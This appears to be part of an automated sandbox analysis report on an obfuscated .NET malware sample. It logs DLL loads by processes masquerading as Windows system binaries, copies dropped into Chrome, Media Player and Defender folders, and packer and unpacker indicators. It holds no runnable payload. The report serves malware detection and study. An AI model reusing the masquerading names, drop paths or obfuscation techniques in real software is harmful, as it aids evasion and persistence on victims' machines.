Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: rasman.dll Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: ntdsapi.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: mscoree.dll
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: version.dll
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: uxtheme.dll
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: windows.storage.dll
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: wldp.dll
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: profapi.dll
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: cryptsp.dll
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: rsaenh.dll
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: cryptbase.dll
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: sspicli.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Section loaded: mscoree.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Section loaded: apphelp.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Section loaded: version.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Section loaded: uxtheme.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Section loaded: windows.storage.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Section loaded: wldp.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Section loaded: profapi.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Section loaded: cryptsp.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Section loaded: rsaenh.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Section loaded: cryptbase.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Section loaded: sspicli.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Section loaded: mscoree.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Section loaded: version.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Section loaded: uxtheme.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Section loaded: windows.storage.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Section loaded: wldp.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Section loaded: profapi.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Section loaded: cryptsp.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Section loaded: rsaenh.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Section loaded: cryptbase.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Section loaded: sspicli.dll
Source: C:\Users\user\3D Objects\services.exe Section loaded: mscoree.dll
Source: C:\Users\user\3D Objects\services.exe Section loaded: apphelp.dll
Source: C:\Users\user\3D Objects\services.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\3D Objects\services.exe Section loaded: version.dll
Source: C:\Users\user\3D Objects\services.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\3D Objects\services.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\3D Objects\services.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\3D Objects\services.exe Section loaded: uxtheme.dll
Source: C:\Users\user\3D Objects\services.exe Section loaded: windows.storage.dll
Source: C:\Users\user\3D Objects\services.exe Section loaded: wldp.dll
Source: C:\Users\user\3D Objects\services.exe Section loaded: profapi.dll
Source: C:\Users\user\3D Objects\services.exe Section loaded: cryptsp.dll
Source: C:\Users\user\3D Objects\services.exe Section loaded: rsaenh.dll
Source: C:\Users\user\3D Objects\services.exe Section loaded: cryptbase.dll
Source: C:\Users\user\3D Objects\services.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Directory created: C:\Program Files\Windows Media Player\Skins\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Directory created: C:\Program Files\Windows Media Player\Skins\2d0856477bae9b Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Directory created: C:\Program Files\Google\Chrome\Application\SetupMetrics\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Directory created: C:\Program Files\Google\Chrome\Application\SetupMetrics\2d0856477bae9b Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Directory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\MoUsoCoreWorker.exe Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Directory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\1f93f77a7f4778 Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Directory created: C:\Program Files\Google\Chrome\Application\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Directory created: C:\Program Files\Google\Chrome\Application\2d0856477bae9b Jump to behavior
Source: ppXCre3i9k.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: ppXCre3i9k.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: ppXCre3i9k.exe, wumGypTcx1DdRpvlrPH.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
.NET source code contains potential unpacker
Source: ppXCre3i9k.exe, S0icZpBHUODkCUZ7yJ2.cs .Net Code: fD0hXe1HG0 System.AppDomain.Load(byte[])
Source: ppXCre3i9k.exe, S0icZpBHUODkCUZ7yJ2.cs .Net Code: fD0hXe1HG0 System.Reflection.Assembly.Load(byte[])
Source: ppXCre3i9k.exe, S0icZpBHUODkCUZ7yJ2.cs .Net Code: fD0hXe1HG0
Source: ppXCre3i9k.exe, U7YfECCi8PVBNd9wsFn.cs High entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
Source: ppXCre3i9k.exe, BAZysyvJW3YnMgtgRFv.cs High entropy of concatenated method names: 'FnPsk1rnYa', 'zHesdDcrwi', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'lBasgmrrC9', '_5f9', 'A6Y'
Source: ppXCre3i9k.exe, HpjSm4BRXAakfSfFh4l.cs High entropy of concatenated method names: 'b8yNsGM6KW', 'YgFNyBuXnB', 'sHRN9HCINE', 'zyvn8IcTB7wpVGXQMJd', 'VBINYOcWZgGSZ8xQEgC', 'yjocj0cuVnxPufwbu03', 'jRbANoceGx3DvmtITQj', 'vwEVOwcrwqbAM3vL5MB', 'taOSnncChv21Fey0hoN', 'eo5UeicG7yJdG1WEa9C'
Source: ppXCre3i9k.exe, C6gqVB9S8ByniEPf8WC.cs High entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'WLyu8XEGE9', 'SsGKirclRF', 'f9ruSQ5Tfv', 'm06KvQBPXj', 'KQlomrYCay1LXVed9Tp', 'mrgr3aYJDNSUtKh65kO', 'Er7KerYe3kkgkHi8GAN'
Source: ppXCre3i9k.exe, w8VUhiVSsfbOrj2pMKI.cs High entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'h6moacn7NqMufpTrplV', 'PExPuAnTOJkSAo3pQE0', 'n6Bo7MnWhZGbDJMki8k', 'O8e20RnuFrD4b2p4KlM', 'TKJnybneynEjZeHPGYK', 'DDf1uWnrX9waj6GB3gn'
Source: ppXCre3i9k.exe, mqFLvAVQF6o9KxuA9iu.cs High entropy of concatenated method names: 'DrxYO4yQgE', 'hhpjX7IV9TMaubNSb1r', 'BWTn3qIqM71RYAIST5M', 'c89RUDIHCQrZTYOPCWq', 'VDsh8oIYqIuBsrMxDeG', 'Aj3mXCI3lDvfAD6FHJA', 'QLw', 'YZ8', 'cC5', 'G9C'
Source: ppXCre3i9k.exe, RekKKXV0yKui3JkIMSm.cs High entropy of concatenated method names: 'kvbYlgNX6m', 'I3kqHGI5pXdyn3LiSVD', 'qOZM4RIwgoRLCa2uPEX', 'OZ8PTOIL7vf2kPTWSwq', 'cstJOHIKEG5fRyUU0Bf', 'MAwuxWIgDpdDCVvbaIg', 'UgBZ9VI9BNIxsywTife', 'U6mStUIPl19DxspAFLO', 'tbtY6Ofjog', 'jI9aKjIOtRJmOAAWZlN'
Source: ppXCre3i9k.exe, Lqav2o9xPDGD2ypa70T.cs High entropy of concatenated method names: 'sg9', 'OZSKVIKunt', 'nP61caFPuI', 'rxFKCFPj2X', 'gh6lPMHpr24l69Yq02J', 'dk66CHH1Tkx06EFpWZw', 'cqOycIHtutSGTYBtNIy', 'GrydE9HZo4XSsiHRIUj', 'sceu6qHD71LOKPtOABn', 'JQKZB3HadwHQnpwYj3F'
Source: ppXCre3i9k.exe, wiTFHUVDqOKOXdT3EnP.cs High entropy of concatenated method names: '_589', 'YZ8', '_491', 'G9C', 'QvgmkIn1BF8mb7L2TYn', 'djvksHntUjSrauD5V5b', 'Rlgxj0nahnkiDSfrI4q', 'TNYX0wnyOO3umxeqY0Z', 'LgrPaCnm2KC0yQBHJQT', 'Kc7oJ9nsfBKRl9xeE6R'
Source: ppXCre3i9k.exe, a0cM2lBNOqcaAJLPF1N.cs High entropy of concatenated method names: 'D0m3HJnJdc', 'JJ73AtEiBp', 'itX3MgmhrW', 'lup3bI83Ik', 'Cya3Fgt8Dv', 'wDVXiOvLyn34Pmx6OyP', 'tneWL0vKCHyh6L4jI5O', 'ge5AdE48VntxB2rwnCf', 'RqZpo14zqRK7S3AF3XN', 'NGECnyv5Xr3CMlTOXJ7'
Source: ppXCre3i9k.exe, utjv8cBBVRR1OpqenA9.cs High entropy of concatenated method names: 'HaiN6yP3SH', 'rOCNVftrYE', 'opZNv7cQlD', 'jB7N5VodNP', 'PMCNLPNJvy', 'mmXNO4cGrK', 'tjJdQUBxAyKJ75vifac', 'wxhEEiB0eKsWmuAISkO', 'EeZPnhBvaHwLr7idaV4', 'MKe25PBAxOTBcMKcH6I'
Source: ppXCre3i9k.exe, h0gdOn7yPSIXCiTxwdx.cs High entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
Source: ppXCre3i9k.exe, LVqSda7Ofwnc4yqC0rT.cs High entropy of concatenated method names: 'eIgEP2ogjvH4rAWVkFH', 'fBjM6vo9HPfyd1uakV1', 'ETPi5Xo5i2Vmobsk7go', 'XWgBgVowPGaeFCe8KhD', 'MZq9nRDl4w', 'WM4', '_499', 'Emr9iXVwwY', 'yBU9jUS1Xs', 'pyU94llr3S'
Source: ppXCre3i9k.exe, r2B6w9BPgVpHi5PnnFA.cs High entropy of concatenated method names: 'Ek63cMdxt6', 'Hpd3euAqwX', 'emT3zaCnOA', 'di8o2Qj4qD', 'seSoYHZV5Q', 'bPToNUKKaf', 'rfnohZ4Luh', 'Mu3o3sVfQR', 'BKhooFaMjw', 'E0noRbvs4fWdb0cbU0a'
Source: ppXCre3i9k.exe, Vln6yo7WJlZv7KVqHH7.cs High entropy of concatenated method names: 'd3ld4TqPgE', 'oKneMkoQZ25RVUAX9pQ', 'jfRQ38oGMpNKy0Fwowa', 'PEBqxNoitiklviVKnJj', 'ql8hB8oSY81HPx3ESQ3', '_1fi', 'qNtk5ftWKi', '_676', 'IG9', 'mdP'
Source: ppXCre3i9k.exe, hv0o8yCye0DcSwu7ITD.cs High entropy of concatenated method names: 'OstDQwNKuM', 'ibGDneCHQW', 'PcCDi3ABmc', 'CeQDje9MFi', 's00D4iE0jT', 'FyEExDjFuDb92LbgcfF', 'NRXWK6jxspCcDFZrPOI', 'xmejFBj0ZTbsWnRTif9', 'HVCp1Hjd3KWA18Fgsnh', 'acunyIj220OoBqLRVUq'
Source: ppXCre3i9k.exe, QWkdks9AWESg7eQO2bf.cs High entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'U4vgy1HhvscZXLdWKbU', 'sYqRvNHXJdmumpLu6hf', 'v6q2HTH44qHMZ9rWllj', 'a0jjlSHv6kGZMulldFS'
Source: ppXCre3i9k.exe, zdy02yVVPrQutTYeoiJ.cs High entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'JPDse1PFtbGbqZQ2MA1', 'oqvVtWPd6Tl68np1xrp', 'qRxdnHP2NKj1nUbyBAY', 'uDaPtNPlS3CtIlfVA9N', 'WP30myPHQi0Z83dL2mm', 'EAU4JEPYliphbrS5Xmh'
Source: ppXCre3i9k.exe, yg5Pr9vuvJsn9txo6p8.cs High entropy of concatenated method names: 'yRYs3V1Y1V', 'PFSso2v3gM', 'dQvsxofNUm', 'nx0s08GXvs', 'gpnsZcNubW', 'SmZs1lpDgA', 'aRmsuepYYX', 'Gwps8CttVm', 'BxSsSENGdo', 'tPfsJaDnkf'
Source: ppXCre3i9k.exe, AG4JPbVLGPH2DUl1Oma.cs High entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'WyQO1L6DC1Hpbl6kr7j', 'fAalNu6p6RccRlYEJp7', 'EfS4oS61R8R4rWy3Mee', 'vw1hSc6tpIs9YVBA2L5', 'b1yMAi6a7lIHR91E7w1', 'A9fIMp6yHR0kefIr1Be'
Source: ppXCre3i9k.exe, KfNQqrVlEiOfxnhLwYF.cs High entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'zrFhQKMyEVX99PB3sUL', 'DavnUjMm3ox0mc0hpXH', 'iURrkGMsouTNAytbPd8', 'V4srL3MbcjJTUS8wtd2', 'J8n0TZMUpdH7flVxJeM', 'zSVwn4MRMvTkSRfRiy5'
Source: ppXCre3i9k.exe, Ljr3ep9fVZWfNJTJFuQ.cs High entropy of concatenated method names: '_5u9', 'UYTKDklBKU', 'b2eu2YF2OL', 'RfuKsffTo5', 'l3ibZwHUsglpnBfvgBr', 'JdH31iHRXKd9pirIos8', 'PgKDbUH8gNJm8LeEmAH', 'm17h2UHsKXsiLXMjQZ5', 'jL6pWjHbOdQ4EVmVYIc', 'lPjAHnHzFMsOSLexxZb'
Source: ppXCre3i9k.exe, VRaKP5VjZbrTd2fp6Gv.cs High entropy of concatenated method names: 'hmaYgsl0T3', 'POP4Vt6xtOBsVxnHTD5', 'pg6KJb60deGdABQ2aWR', 'Sjbx6W6v9al9G3T5ggB', 'CYJYXu6AEDv6LvyiHHy', 'TRdlkO6F5CEZyOiwDFB', 'WLuFg66dIYSKnMttoYp', 'xL69MY62BmirgoWyUQD', 'auTnSm6lduGmTNThMqw', 'f28'
Source: ppXCre3i9k.exe, rDE5Qg9navuRbU0MVtk.cs High entropy of concatenated method names: 'YnAN2JVrU7DPHMUr2er', 'mh7HKnVC6pf8aGPZX6i', 'kEnR0yVu6FZXkgC7Muh', 'YPuuc7Ve3WVjYEO5BY5', 'IWF', 'j72', 'zccuCP6Dpu', 'jjMu751rCb', 'j4z', 'VKGuEPc673'
Source: ppXCre3i9k.exe, UTZPpwOq6F6tldfOFK.cs High entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'YqCKOroN1', 'HZOQjd5uLDWS99BjJ1X', 'QiOlkH5eLcKbyBSZIJt', 'R6ddcL5reAjOSvjmdqo', 'IlMIa95Cpdva9Tkiltj', 'qpjooY5Jdm6wwQRv37U'
Source: ppXCre3i9k.exe, QesomC9jxWaOS7jFMYs.cs High entropy of concatenated method names: 'dkr1GRdDfJ', 'F5S1a0pyiA', 'e3a1CXd6k8', 'EEbgWPlotfvpavkBQOs', 'zCvi5FlN8mTcWJcTw8o', 'RGb4vplEuJrE2FpMt5O', 'JsJFKvlkqhXum9sOG4h', 'hKQ1xeOn7P', 'uBo10d9QI9', 'TCq1ZnAhJt'
Source: ppXCre3i9k.exe, S0icZpBHUODkCUZ7yJ2.cs High entropy of concatenated method names: 'qGAhtVAkGU', 'J48hQiPsXY', 'xphhnCcgpW', 'frEhiAuPaM', 'yyHhjX2Ejc', 'o18h4NNWsC', 'sLdhTej9nm', 'TKbMmThV5fZa6xaslDp', 'LEAOQLhH2583cOKkl9F', 'm7NErNhY3XE5bPpGjER'
Source: ppXCre3i9k.exe, PeeUpfVyUTQFrnoypuO.cs High entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'KUAEcG68S0pfWEd8fsb', 'iO5HVC6zN7E0iR5kigV', 'GjHjC5OLRRj3lKlUSPk', 'mcHPyGOKw7794VWXtDJ', 'o3jBDHO5YjDN4enBvK2', 'NCxYk1OwbQZX2pE2ORY'
Source: ppXCre3i9k.exe, JHGdim7f3YfQIy2Jsv6.cs High entropy of concatenated method names: 'PJ1', 'jo3', 'jgYg1ZCh55', 'T5OguYjrNr', 'rFTg8JCON8', 'EC9', '_74a', '_8pl', '_27D', '_524'
Source: ppXCre3i9k.exe, cTNOKLVMbG4WfcCEMHc.cs High entropy of concatenated method names: 'QcANYYdIaO', 'pGANN69F1n', 'cB9NhhI4l4', 'Dhha0CIa5fCgd5RKPSR', 'xcZGSMIyjMFLDEnoeFF', 'Cj2DF9I1NSxUHUPevaG', 'yswYZZItx7LMru8rK3e', 'p410x3Imt2WygUupmqC', 'cyWhHZIsKsoepx6xayF', 'JS6sFZIbIs7exu6rkZ9'
Source: ppXCre3i9k.exe, npbGdK9aRMtc32et589.cs High entropy of concatenated method names: 'NJyZK4dZl0', 'AgjZRlbqAd', 'Gh7ZlbcMgl', 'pDsZpQygOB', 'KdVVSe2WaEqSVt621yN', 'nQrBgW2ukqBU9guGYsT', 'QbijjA2eyFj83NnnpCP', 'xEQ0u827MRfR9XtUtsl', 'Q86XwX2TD3JwSXfuxqr', 'm6e1iC2rBiQgZJPr6Xo'
Source: ppXCre3i9k.exe, vkddfNTLptHB5yVtnbN.cs High entropy of concatenated method names: 'qIimFgumhJ', 'tHnmssLwj4', 'YrrmyWRkBc', 'u4Jm9RV4s1', 'pIpmk8mio3', 'myMmdFJTN0', 'OTymg7alEn', 'HY6mqbgUc9', 'kbSmmlVImi', 'FXZmtuwEZc'
Source: ppXCre3i9k.exe, Cjh6AY7AEKdHqLVgThL.cs High entropy of concatenated method names: 'Q7VyWs1kDE', 'l9lyHo3fn7', 'sl9yA7RPFK', 'xdfyMWBWOv', 'T1fybLy7cl', 'Ao86g6fUjnSlncteQPj', 'jo40HNfRRb3NXh2DBFT', 'AxOlwbf8fvXjtJfFyXI', 'xL5LXXfzqICRNaeXj7c', 'uyxsP0NLZN8QjQvfUjV'
Source: ppXCre3i9k.exe, Gup4V1775EXSy5KgqSK.cs High entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
Source: ppXCre3i9k.exe, wumGypTcx1DdRpvlrPH.cs High entropy of concatenated method names: 'xnOrSFZ3c4ZJILuHELW', 'UskrwOZjSBhZOEHh2Vn', 'OahgoQZVx8S34I3qjqa', 'XNfMrrZqoT0eBFV89wE', 'gW0mXFIEdf', 'FNn5EVZQWr80Iu177X8', 'w9akqsZGU2o235ExioL', 'mbnFPFZ71E5dUMSy498', 'e43OIDZTtKjmhHV7B5H', 'KHn2eWZWre2pIw102Yq'
Source: ppXCre3i9k.exe, vLBakaVnRSPIJnJLGqn.cs High entropy of concatenated method names: 'LYgNPkn3r4', 'vMZPYucPU8KQ3CqOgiX', 'oVGoxtcMGKJQ5jZvm2v', 'yjfemqcgmO6GIO5Agq8', 'XxnMxxc9jhlkqpYTImr', 'NjJ2qRc6E1EFQHM6CoW', '_5q7', 'YZ8', '_6kf', 'G9C'
Source: ppXCre3i9k.exe, MP75bhEJEWdfCNwIAB.cs High entropy of concatenated method names: 'j03neDuTq', 'gApiAlMUF', 'JjSjNRYK6', 'YiaUTwKCWNGWfajiG4Z', 'LpnamgKeRKiQXUyotWn', 'TnSLJRKrchtj98Derju', 'kd3WZoKJgZ1GRJLKL37', 'OEU4lMKffua4i9FuW0u', 'nrCNAEKNbHfwsRfypCA', 'yQf9eTKEAWN1NFQJ9Wd'
Source: ppXCre3i9k.exe, WLuIF1B2UPGXeMHdmwL.cs High entropy of concatenated method names: 'EvSxZ0IMOx', 'fvtx1gZBvo', 'PMmhmJxsfompRMvQ4Yk', 'vJDmk5xbgbGgspCMMCp', 'E8tXb8xyWWu7ynT6RZi', 'sIvdBVxmh9ZIUcPL5kZ', 'NMaxCxCP1p', 'RZehYF0LMFA1pXRn2aZ', 'LGyQPr0KntPMicwcq8Z', 'GFoGY9x8peUMMySimoW'
Source: ppXCre3i9k.exe, GwRNNkVT43WjKOCBbAo.cs High entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'bLmoNuPsGxHsbXxIOy8', 'fWv29ePbF7wVwRT65eo', 'l2BH0PPUNW2QUGpLQqP', 'wMNn3EPRFxIVqKbvQim', 'PiO5q9P8i0RWDhH3Spm', 'hwspoXPzDjI87C2o1FN'
Source: ppXCre3i9k.exe, Ccw4DaVGSqOiIPH25Fe.cs High entropy of concatenated method names: 'iOsN8cKEFe', 'DZYNSwJJxl', 'u6EVuEncUTw1h8Ii5bD', 'kB7ZrunIbkxDoAxyyI2', 's61ngEnnCcSHWWBRTQe', 'LsQXxWnBc5GIFQ1lk2w', 'hamNQsnhQ0uWuK3tvsx', 'yP6IwAnXQMhR8JCaL2j', 'cYSDq1n4Cbp0CsPc71x', 'awZGtUnvv3eGfKmU669'
Source: ppXCre3i9k.exe, WKMKwlvPQK6P5OopAKc.cs High entropy of concatenated method names: 'mlwFRSMqcE', 'V7tFlUE1vA', 'LmhFpW8jNa', 'RX0wqprujvlmmIJAciN', 'R7H6dxrTjoUSuVbVJmW', 'zjUMu8rWYkDKBUP9bC1', 'jI5UorreibYfxyntuRK', 'lJ8En5rrW0X5PAC6KEF'
Source: ppXCre3i9k.exe, aoAQQVV5FQ5sdmaEBde.cs High entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'Ni5f176uUlJZh80EVT9', 'gBJOf16eJm95ZOrowlS', 'FNjPPS6rgIypNDaWep3', 'VP5IxY6CAwPUuqORcL1', 'cxT58E6JugfbgPh13OG', 'kvmkue6fkyZ2PK17Q8Z'
Source: ppXCre3i9k.exe, Re0uQ3v4aO0v1kUu8eB.cs High entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
Source: ppXCre3i9k.exe, j9iNiD7BoHEMIZl6ddP.cs High entropy of concatenated method names: 'RoYyZJ4CHk', 'f7Ey1sPVv7', '_8r1', 'Ul8yuqoYCi', 'E3Vy8eP3PS', 'fvRySKUryM', 'YTyyJa7WY9', 'Se6DkJfvCTIKAbdua6M', 'FA0FT6fAoJHg6lwPP8G', 'xX7GN8fxqg0oyYBlgLr'
Source: ppXCre3i9k.exe, TUmUQvCHYQrenuKmGDC.cs High entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
Source: ppXCre3i9k.exe, DUBSHhBJbSP1j83ilJW.cs High entropy of concatenated method names: 'YAH0sNkQsY', 'AOfEgH0tJTyuuxbfWBc', 'nYnyX30phiPHB6JNZAw', 'goN2V601iXvZBi8nZHU', 'WcB84Q0ahTTSES0gCqK', 'K8xTU30yZxMHoDjNVK7', 'aNY0EduxWY', 'hBj0PR7sXM', 't9N0WM4agV', 'Wge0H9EOUL'
Source: ppXCre3i9k.exe, kllILHKBssGQPsIOpj.cs High entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'Q99w3y5nQVtVIkIPxIy', 'OQvOrh5cGN30bP0Nuv2', 'SdPkAf5B9PjJLNXcYdO', 'ex3r0M5h7CYIJbD2GFh', 'mSQuvg5Xh7E4oSPT66l', 'OFih3f54Dy4uuh1Q0Nd'
